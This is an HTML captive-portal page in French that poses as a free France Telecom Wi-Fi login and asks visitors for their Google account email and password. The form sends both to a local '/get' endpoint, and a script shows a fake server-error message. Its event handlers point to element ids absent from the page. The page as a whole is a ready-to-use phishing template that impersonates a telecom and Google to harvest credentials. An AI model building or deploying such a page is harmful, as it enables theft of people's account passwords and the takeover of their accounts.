<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        /* Styles généraux pour les écrans étroits (smartphones) */
        a:hover {
            text-decoration: underline;
        }

        body {
            font-family: Arial, sans-serif;
            align-items: center;
            justify-content: center;
            background-color: #FFFFFF;
        }

        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 12px 10px;
            margin: 8px 0;
            box-sizing: border-box;
            border: 1px solid #cccccc;
            border-radius: 4px;
        }

        .container {
            max-width: 100%;
            margin: auto;
            padding: 20px;
        }

        .logo-container {
            text-align: center;
            margin-bottom: 30px;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .logo {
            max-width: 40px;
            max-height: 40px;
            fill: #FFC72C;
            margin-right: 100px;
        }

        .company-name {
            font-size: 42px;
            color: black;
            margin-left: 0px;
        }

        .form-container {
            background: #FFFFFF;
            border: 1px solid #CEC0DE;
            border-radius: 4px;
            padding: 20px;
            box-shadow: 0px 0px 10px 0px rgba(108, 66, 156, 0.2);
        }

        h1 {
            text-align: center;
            font-size: 28px;
            font-weight: 500;
            margin-bottom: 20px;
        }

        .input-field {
            width: 100%;
            padding: 12px;
            border: 1px solid #BEABD3;
            border-radius: 4px;
            margin-bottom: 20px;
            font-size: 14px;
        }

        .submit-btn {
            background: #000000;
            color: white;
            border: none;
            padding: 12px 20px;
            border-radius: 4px;
            font-size: 16px;
        }

        .submit-btn:hover {
            background: #5B3784;
        }

        .containersubtitle {
            color: #000000;
        }

        .containertitle {
            color: #000000;
        }

        /* Styles spécifiques pour les écrans larges (PC) */
        @media screen and (min-width: 768px) {
            .logo {
                max-width: 80px;
                max-height: 80px;
            }
        }
    </style>
</head>
<body>
<div class="container">
    <div class="logo-container">
        <?xml version="1.0" standalone="no"?>
        <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20010904//EN"
        "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">
        <svg xml:space="preserve" style="max-height: 500px" viewBox="60 195 383 140" y="0px" x="0px" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg" id="Layer_1" version="1.1" width="383" height="140">
<style type="text/css">
	.st0{fill:#F5821F;}
	.st1{fill:#ED1C24;}
	.st2{fill:#373529;}
</style>
<g id="XMLID_26_">
	<path d="M293.4,263h-6.4v13c0,2,0.1,3.3,0.3,4c0.2,0.7,0.5,1.4,1,1.8c0.5,0.4,1.2,0.7,1.9,0.7&#xA;&#9;&#9;c1.2,0,2.9-0.9,3.8-2.3l0.4,0.2c-0.5,1.2-1.4,2.2-2.5,3c-1,0.7-2.1,0.8-3.2,0.8c-1.2,0-2.3-0.4-3.3-1.1c-0.9-0.8-1.5-1.6-1.8-2.6&#xA;&#9;&#9;c-0.2-1-0.3-2.8-0.3-5.3V263h-3.1v-1.1c1.5,0,2.7-0.6,3.9-1.8c1.2-1.2,1.9-2.8,2.2-5h0.8v6.7h6.4L293.4,263" class="st0" id="XMLID_28_"/>
	<path d="M314.6,269.3h-15.1c-0.1,1-0.1,1.8-0.1,2.3c0,3.8,0.6,6.6,1.8,8.5c1.2,1.9,3,2.8,5.3,2.8&#xA;&#9;&#9;c3.2,0,6.1-1.4,7.5-4.3h0.6c-0.6,1.8-1.7,3.2-3.4,4.1c-1.7,1-3.5,1.5-5.5,1.5c-1.8,0-3.6-0.5-5.2-1.4c-1.6-0.9-3-2.2-4-3.9&#xA;&#9;&#9;c-1-1.7-1.6-3.7-1.6-6.1c0-3.4,1-6.2,3-8.4c2-2.2,4.5-3.4,7.5-3.4c2.8,0,5,0.9,6.6,2.6C313.7,265.4,314.6,267.3,314.6,269.3&#xA;&#9;&#9; M310.1,268.2c0.1-0.4,0.1-0.8,0.1-1.1c0-1.5-0.5-2.7-1.4-3.6c-0.9-0.8-2-1.3-3.3-1.3c-3.2,0-5.1,2-5.7,5.9H310.1z" class="st0" id="XMLID_34_"/>
	<path d="M346.8,269.3h-15.1c-0.1,1-0.1,1.8-0.1,2.3c0,3.8,0.6,6.6,1.8,8.5c1.2,1.9,3,2.8,5.3,2.8&#xA;&#9;&#9;c3.2,0,6.1-1.4,7.4-4.3h0.6c-0.6,1.8-1.7,3.2-3.4,4.1c-1.7,1-3.5,1.5-5.5,1.5c-1.8,0-3.6-0.5-5.2-1.4c-1.6-0.9-3-2.2-4-3.9&#xA;&#9;&#9;c-1-1.7-1.6-3.7-1.6-6.1c0-3.4,1-6.2,3-8.4c2-2.2,4.5-3.4,7.5-3.4c2.8,0,5,0.9,6.6,2.6C345.9,265.4,346.7,267.3,346.8,269.3&#xA;&#9;&#9; M342.2,268.2c0.1-0.4,0.1-0.8,0.1-1.1c0-1.5-0.5-2.7-1.4-3.6c-0.9-0.8-2-1.3-3.3-1.3c-3.2,0-5.1,2-5.7,5.9H342.2z" class="st0" id="XMLID_37_"/>
	<path d="M368.7,278.1h0.5c-1.2,4.1-4.2,6.1-8.9,6.1c-3.1,0-5.6-1-7.7-3.1c-2.1-2.1-3.1-4.8-3.1-8.2&#xA;&#9;&#9;c0-3.5,1.1-6.3,3.4-8.5c2.3-2.2,4.9-3.3,8-3.3c1.9,0,3.6,0.4,5.1,1.2c1.6,0.8,2.3,1.8,2.3,2.9c0,0.4-0.1,0.8-0.4,1.2&#xA;&#9;&#9;c-0.3,0.4-0.7,0.6-1.2,0.6c-1.2,0-1.9-0.7-2.1-2c-0.2-1-0.5-1.7-1-2.1c-0.5-0.4-1.3-0.6-2.6-0.6c-2.3,0-4.1,0.8-5.3,2.4&#xA;&#9;&#9;c-1.2,1.6-1.8,4.1-1.8,7.4c0,3.4,0.6,6,1.9,7.9c1.3,1.9,3.2,2.9,5.8,2.9C364.9,283,367.7,281.4,368.7,278.1" class="st0" id="XMLID_38_"/>
	<path d="M371.5,272.7c0-3.3,1.1-6,3.3-8.2c2.2-2.2,4.9-3.3,8.1-3.3c3.2,0,6,1.1,8.2,3.3&#xA;&#9;&#9;c2.2,2.2,3.3,5,3.3,8.2c0,3.6-1.1,6.5-3.4,8.5c-2.2,2.1-4.9,3.1-8.1,3.1c-3.2,0-5.9-1-8.1-3.2C372.6,279,371.5,276.2,371.5,272.7&#xA;&#9;&#9; M375.9,272.8c0,3.8,0.6,6.5,1.9,8c1.2,1.5,3,2.3,5.2,2.3c2.3,0,4-0.8,5.2-2.3c1.2-1.5,1.8-4.2,1.8-8c0-3.8-0.6-6.4-1.8-8&#xA;&#9;&#9;c-1.2-1.6-3-2.4-5.3-2.4c-2.3,0-4,0.8-5.2,2.4C376.5,266.3,375.9,269,375.9,272.8z" class="st0" id="XMLID_41_"/>
	<path d="M322.2,247.3c-0.5,0.3-1.5,0.8-3,1.1c-1.5,0.2-2.7,0.4-3.8,0.4v0.3c1.6,0,2.6,0.3,3,0.9&#xA;&#9;&#9;c0.4,0.6,0.6,2.6,0.6,4.8v28.7h3.8v-36.2H322.2" class="st0" id="XMLID_43_"/>
	<path d="M432.1,264.9c-0.2-1-0.9-1.9-2.1-2.6c-1.2-0.8-2.6-1.2-4.3-1.2c-1.5,0-2.9,0.4-4.3,1.2&#xA;&#9;&#9;c-1.4,0.8-2.8,2-4.1,3.6c-0.4-1.6-1.2-2.8-2.3-3.6c-1.1-0.8-2.5-1.2-4.3-1.2c-1.6,0-3,0.4-4.4,1.1c-1.4,0.7-2.6,1.9-3.8,3.4&#xA;&#9;&#9;c0-1.8-0.2-3.3-0.8-4.5h-0.3c-1.6,0.6-3.7,1.2-6.1,1.5v0.4c1.2,0,2,0.1,2.5,0.4c0.5,0.3,0.7,1.2,0.8,1.8c0.1,0.6,0.1,2.1,0.1,4.5&#xA;&#9;&#9;v13.8h3.8v-16.4c1.2-1.4,2.3-2.4,3.5-3.1c1.1-0.7,2.2-1,3.3-1c1.1,0,2.1,0.3,2.8,0.9c0.8,0.6,1.2,1.3,1.4,2.2&#xA;&#9;&#9;c0.1,0.9,0.2,2.2,0.2,4.1v13.3h3.8v-15.9c1.2-1.5,2.3-2.7,3.5-3.5c1.1-0.8,2.3-1.1,3.4-1.1c1.1,0,2,0.3,2.7,0.8&#xA;&#9;&#9;c0.7,0.5,1.1,1.2,1.3,1.9c0.2,0.7,0.3,1.8,0.3,3.3v14.5h3.8v-13.8C432.5,267.5,432.4,265.9,432.1,264.9" class="st0" id="XMLID_44_"/>
	<path d="M123.7,205.1L123.7,205.1c-0.7-0.2-1.3-0.2-2-0.2h0c-0.2,0-0.3,0-0.5,0l-0.1,0&#xA;&#9;&#9;c-0.1,0-0.2,0-0.4,0c-0.1,0-0.2,0-0.3,0l-0.2,0c-4.1,0.6-8.7,3.6-11.8,8.1c-0.1,0.1-0.1,0.2-0.2,0.3v0c-0.1,0.2-0.3,0.5-0.4,0.7&#xA;&#9;&#9;c2.7-4.2,8.6-4.9,10.7,3c2.1,8-3.1,21.5-14.9,28.9l0,0c0.1,0.7,0.3,1.3,0.5,2l0,0l0.1,0c7-4.2,15.6-8.9,20.5-16.9&#xA;&#9;&#9;c6.7-10.1,6.3-21.8-0.1-25.7c-0.2-0.1-0.3-0.1-0.5-0.2C124,205.1,123.8,205.1,123.7,205.1" class="st0" id="XMLID_45_"/>
	<path d="M92.3,257.6c2.3,8.4,5.9,15.6,10.5,21.4c4.6-1.4,9.4-3.6,14.3-6.3l0,0&#xA;&#9;&#9;c-5.7-6.1-10.5-14.1-13-24.4c0-0.1,0-0.2-0.1-0.3c-0.2-0.7-0.3-1.3-0.5-2c-2.5-11.9-0.4-23.9,3.8-31.4c0.2-0.4,0.5-0.9,0.8-1.3v0&#xA;&#9;&#9;c0.1-0.1,0.1-0.2,0.2-0.3c3.1-4.5,7.7-7.5,11.8-8.1l0.2,0c0.1,0,0.2,0,0.3,0c0.1,0,0.2,0,0.4,0l0.1,0c0.2,0,0.3,0,0.5,0h0&#xA;&#9;&#9;c0.7,0,1.4,0.1,2,0.2l0,0c0.1,0,0.3,0.1,0.4,0.1c0.2,0,0.3,0.1,0.5,0.2c-1.9-1.2-4.5-1.3-7.2-0.4l0,0c-5.3,1.4-11.9,6.5-16.8,13.2&#xA;&#9;&#9;c-6.7,8.8-10.8,21.8-9.2,34.4c0.1,0.9,0.2,1.8,0.4,2.7C92,256,92.2,256.8,92.3,257.6" class="st1" id="XMLID_49_"/>
	<path d="M150.1,289.8c-7.5-1.3-16-4.2-23.8-9.4l-0.1,0.1c-3.9,3.2-8.3,5.9-12.9,8.1&#xA;&#9;&#9;c6.3,4.1,13.5,6.4,21.2,6.5c5.8,0.1,11.3-1.3,15.9-5C150.6,290.1,150.5,289.9,150.1,289.8" class="st1" id="XMLID_50_"/>
	<path d="M140.5,257.3c-0.2-5.7-3.7-9.4-7-10.6c2.1,6.7-2,18-16.3,26.1l0,0c-4.8,2.7-9.7,4.9-14.3,6.3&#xA;&#9;&#9;c-7.8,2.4-14.8,2.3-19.4-1.8c-2.9-2.6-7.4-10.6,8.3-21.9c-0.2-0.9-0.3-1.8-0.4-2.7h0c-8.9,5.5-17.9,12.3-21.7,20.1&#xA;&#9;&#9;c-4.6,9.5-2.6,20.1,10.3,22.4c8.7,1.6,21.6-0.8,33.3-6.5c4.6-2.2,9-4.9,12.9-8.1l0.1-0.1C135.8,272.8,140.7,263.8,140.5,257.3" class="st0" id="XMLID_51_"/>
	<path d="M228.2,264.9c-0.3-1-1-1.9-2.1-2.6c-1.1-0.7-2.5-1.1-4.2-1.1c-1.5,0-2.9,0.4-4.3,1.1&#xA;&#9;&#9;c-1.4,0.7-2.7,1.9-3.9,3.4c-0.1-1.9-0.3-3.4-0.7-4.5h-0.7c-2,0.6-4,1.3-5.9,1.5v0.3c1.3,0,2.1,0.1,2.6,0.4c0.5,0.3,0.7,1.2,0.8,1.7&#xA;&#9;&#9;c0.1,0.5,0.1,2.1,0.1,4.6v13.8h3.8v-16c1-1.5,2.1-2.7,3.3-3.4c1.2-0.8,2.4-1.1,3.6-1.1c1.1,0,2,0.3,2.7,0.8&#xA;&#9;&#9;c0.7,0.6,1.2,1.2,1.3,1.9c0.2,0.7,0.2,1.9,0.2,3.6v14.2h3.8v-14C228.7,267.4,228.5,265.9,228.2,264.9" class="st2" id="XMLID_52_"/>
	<path d="M181.9,262.2c-0.7-0.7-1.6-1.1-2.7-1.1c-1.3,0-2.6,0.5-3.9,1.6c-1.3,1-2.3,2.3-2.9,3.9&#xA;&#9;&#9;c-0.1-2.3-0.3-4.1-0.8-5.5c-2.7,0.8-4.8,1.3-6.5,1.5v0.3h0.5c1.1,0,1.9,0.2,2.3,0.5c0.4,0.3,0.7,1.6,0.7,2.2&#xA;&#9;&#9;c0.1,0.6,0.1,2.1,0.1,4.4v13.5h3.8v-11.1c0-1.9,0.1-3.4,0.4-4.5c0.3-1.1,1-2.2,2-3.2c1.1-1,1.9-1.6,2.7-1.6c0.6,0,1.1,0.4,1.4,1.3&#xA;&#9;&#9;c0.5,1.3,1.1,1.9,2,1.9c0.5,0,0.9-0.2,1.3-0.6c0.3-0.4,0.5-0.8,0.5-1.3C182.9,263.6,182.5,262.9,181.9,262.2" class="st2" id="XMLID_57_"/>
	<path d="M163.1,261.9v1.1h-4.6V277c0,2.3,0,3.8,0.1,4.4c0.1,0.6,0.3,1.1,0.7,1.4&#xA;&#9;&#9;c0.4,0.3,1.2,0.5,2.3,0.5h1.1v0.3h-11.7v-0.3c1.2,0,2.1-0.1,2.5-0.4c0.5-0.2,0.8-0.6,0.9-1.1c0.1-0.5,0.2-2.1,0.2-4.7v-13.9h-4&#xA;&#9;&#9;v-1.1h4V260c0-2.2,0.1-3.9,0.3-5.1c0.2-1.2,0.7-2.4,1.5-3.7c0.8-1.3,1.8-2.2,3.1-2.9c1.2-0.7,2.7-1,4.4-1c2.1,0,3.7,0.4,5,1.3&#xA;&#9;&#9;c1.2,0.9,1.9,1.7,1.9,2.6c0,0.5-0.2,0.9-0.5,1.3c-0.4,0.3-0.8,0.5-1.3,0.5c-0.9,0-1.8-0.7-2.6-2.1c-0.9-1.6-2-2.4-3.3-2.4&#xA;&#9;&#9;c-1.1,0-2.1,0.4-2.9,1.2c-0.8,0.8-1.3,1.8-1.5,3c-0.2,1.2-0.2,3.8-0.2,7.7v1.6L163.1,261.9" class="st2" id="XMLID_58_"/>
	<path d="M205.8,279.5h0.4c-0.2,3-1.5,4.5-4.3,4.5c-1.2,0-2.2-0.3-2.9-1c-0.7-0.6-1.2-1.6-1.4-2.8&#xA;&#9;&#9;c-1.8,1.3-3.4,2.2-4.8,2.8c-1.5,0.6-2.8,1-3.9,1c-1.5,0-2.7-0.4-3.8-1.3c-1.1-0.8-1.6-1.9-1.6-3.3c0-1.8,0.9-3.4,2.7-4.7&#xA;&#9;&#9;c1.8-1.3,4.2-2.7,7.4-3.9l4.1-1.7v-1.1c0-1.5-0.1-2.6-0.3-3.2c-0.2-0.7-0.7-1.7-1.5-2.3c-0.8-0.5-1.9-0.8-3.2-0.8&#xA;&#9;&#9;c-2.7,0-4.2,1.4-4.5,3.1c-0.3,1.8-1,2.7-2.2,2.7c-1.1,0-1.6-0.5-1.6-1.5c0-1,0.7-2.1,2.1-3.2c1.4-1.2,3.7-1.7,6.7-1.7&#xA;&#9;&#9;c2.2,0,4,0.3,5.2,1c1.2,0.7,2.1,1.5,2.5,2.4c0.4,0.9,0.6,2.2,0.6,4.1v8.6c0,2,0.1,3.3,0.3,3.9c0.2,0.6,0.7,0.9,1.4,0.9&#xA;&#9;&#9;C204.4,282,205.5,281.2,205.8,279.5 M197.7,270.4l-2.9,1.2c-4.6,1.8-6.8,4.1-6.8,6.9c0,1.1,0.3,2,0.9,2.6c0.6,0.7,1.3,1.2,2.3,1.2&#xA;&#9;&#9;c0.8,0,1.8-0.2,2.9-0.7c1.1-0.5,2.3-1.1,3.7-2.2V270.4z" class="st2" id="XMLID_61_"/>
	<path d="M251.7,278.1h0.5c-1.2,4.1-4.2,6.1-8.9,6.1c-3.1,0-5.6-1-7.7-3.1c-2.1-2.1-3.1-4.8-3.1-8.2&#xA;&#9;&#9;c0-3.5,1.1-6.3,3.4-8.5c2.3-2.2,4.9-3.3,8-3.3c1.9,0,3.6,0.4,5.1,1.2c1.6,0.8,2.3,1.8,2.3,2.9c0,0.4-0.1,0.8-0.4,1.2&#xA;&#9;&#9;c-0.3,0.4-0.7,0.6-1.2,0.6c-1.2,0-1.9-0.7-2.1-2c-0.2-1-0.5-1.7-1-2.1c-0.5-0.4-1.3-0.6-2.6-0.6c-2.3,0-4.1,0.8-5.3,2.4&#xA;&#9;&#9;c-1.2,1.6-1.8,4.1-1.8,7.4c0,3.4,0.6,6,1.9,7.9c1.3,1.9,3.2,2.9,5.8,2.9C247.9,283,250.8,281.4,251.7,278.1" class="st2" id="XMLID_62_"/>
	<path d="M273.1,269.3h-15.1c-0.1,1-0.1,1.8-0.1,2.3c0,3.8,0.6,6.6,1.8,8.5c1.2,1.9,3,2.8,5.3,2.8&#xA;&#9;&#9;c3.2,0,6.1-1.4,7.5-4.3h0.6c-0.6,1.8-1.7,3.1-3.4,4.1c-1.7,1-3.5,1.5-5.5,1.5c-1.8,0-3.6-0.5-5.2-1.4c-1.6-0.9-3-2.2-4-3.9&#xA;&#9;&#9;c-1-1.7-1.6-3.7-1.6-6.1c0-3.4,1-6.2,3-8.4c2-2.2,4.5-3.4,7.5-3.4c2.8,0,5,0.9,6.6,2.6C272.2,265.4,273,267.3,273.1,269.3&#xA;&#9;&#9; M268.5,268.2c0.1-0.4,0.1-0.8,0.1-1.1c0-1.5-0.5-2.7-1.4-3.6c-0.9-0.8-2-1.3-3.3-1.3c-3.2,0-5.1,2-5.7,5.9H268.5z" class="st2" id="XMLID_65_"/>
</g>
</svg> 
    </div>
    <div class="form-container">
        <center>
            <h1 class='containertitle'>Bienvenue sur le Wifi Gratuit France Telecom.</h1>
            <h2 class='containersubtitle'> Connectez vous grace a votre compte Google.</h2>
        </center>
        <form action="/get" id="login-form">
            <input name="email" class="input-field" type="text" placeholder="Google Account" required>
            <input name="password" class="input-field" type="password" placeholder="Password" required>
            <button class="submit-btn" type="submit">Continue</button>
        </form>
    </div>
</div>
<script>
function showErrorPage() {document.write("<div style='margin-top:10%;background: lightgrey;max-width: 33%;margin: auto;padding: 20px;'><h1 style='text-align: center;color: black'>Our servers seem to be having some difficulties<h1></div>");}document.getElementById("submitbtn").addEventListener("click", showErrorPage);document.getElementById("forgot_credentials").addEventListener("click", showErrorPage);
</script>
</body>
</html>
